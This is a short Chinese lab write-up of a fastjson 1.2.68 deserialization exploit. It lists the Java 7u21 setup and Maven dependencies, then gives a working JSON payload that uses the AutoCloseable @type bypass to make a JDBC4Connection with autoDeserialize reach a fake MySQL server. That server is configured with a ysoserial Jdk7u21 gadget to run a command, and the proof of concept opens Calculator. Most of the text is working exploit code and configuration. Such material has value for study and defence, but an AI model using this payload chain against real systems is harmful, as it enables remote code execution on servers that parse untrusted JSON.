fastjson 1.2.68利用

一 环境

mac M1
java version "1.7.0_21"
jdk下载地址 https://www.oracle.com/java/technologies/javase/javase7-archive-downloads.html

二 pom

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>org.example</groupId>
    <artifactId>java7_fastjson</artifactId>
    <version>1.0-SNAPSHOT</version>

    <properties>
        <maven.compiler.source>7</maven.compiler.source>
        <maven.compiler.target>7</maven.compiler.target>
    </properties>
    <dependencies>
        <dependency>
            <groupId>com.alibaba</groupId>
            <artifactId>fastjson</artifactId>
            <version>1.2.68</version>
        </dependency>
        <dependency>
            <groupId>mysql</groupId>
            <artifactId>mysql-connector-java</artifactId>
            <version>5.1.29</version>
        </dependency>
    </dependencies>

</project>

​

三 java 代码

import com.alibaba.fastjson.JSON;

public class main {
    public static void main(String[] args){
        String string = "{\"@type\":\"java.lang.AutoCloseable\"{\"@type\":\"com.mysql.jdbc.JDBC4Connection\",\"hostToConnectTo\":\"127.0.0.1\",\"portToConnectTo\":3307,\"info\":{\"user\":\"yso_Jdk7u21_calc\",\"password\":\"oihnqwa\",\"statementInterceptors\":\"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor\",\"autoDeserialize\":\"true\"},\"databaseToConnectTo\":\"test\",\"url\":\"\"}";
        Object obj = JSON.parseObject(string);
        System.out.println(obj.toString());
    }
}

四 MySQL Fake Server

https://github.com/fnmsd/MySQL_Fake_Server
1 config.json 中 修改java路径

"javaBinPath":"/Library/Java/JavaVirtualMachines/jdk1.7.0_21.jdk/Contents/Home/bin/java",

2 放入一个ysoserial jar包
3 server.py中，强制修改掉命令
yso_command = "open /System/Applications/Calculator.app"

elif username.startswith(b"yso_"):
	query =(yield from packet.read())
    _,yso_type,yso_command = username.decode('ascii').split("_")
    yso_command = "open /System/Applications/Calculator.app"

​

五 运行

运行java代码，成功弹出

六 问题

1 不管成功不成功，都会有 "Could not map transaction isolation '11 to a valid JDBC level."这个报错
2 在jdk1.8的版本下，怎么利用
​